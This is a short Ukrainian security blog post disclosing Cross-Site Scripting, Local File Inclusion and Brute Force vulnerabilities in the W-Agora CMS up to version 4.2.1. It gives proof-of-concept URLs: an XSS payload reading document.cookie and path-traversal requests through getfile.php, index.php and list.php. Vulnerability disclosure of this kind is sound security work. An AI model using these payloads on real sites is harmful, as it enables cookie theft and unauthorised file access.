Websecurity - Веб безпека

15.01.2011

У жовтні, 27.10.2010, я знайшов Cross-Site Scripting, Local File Inclusion та Brute Force уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я виявив на офіційноу сайті w-agora.net. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

16.03.2011

XSS:

http://site/current/getfile.php/support_howto/%22%3E%3Cbody%20onload=alert(document.cookie)%3E/1/

Local File Inclusion:

В папці conf:

http://site/current/getfile.php/1

http://site/current/index.php?bn=1

http://site/current/list.php?bn=1

В будь-які папці (тільки на Windows-серверах):

http://site/current/getfile.php/..\1

http://site/current/index.php?bn=..\1

http://site/current/list.php?bn=..\1

Brute Force:

http://site/current/login.php

Уразливі W-Agora 4.2.1 та попередні версії.

This entry was posted on 15:03 16.03.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.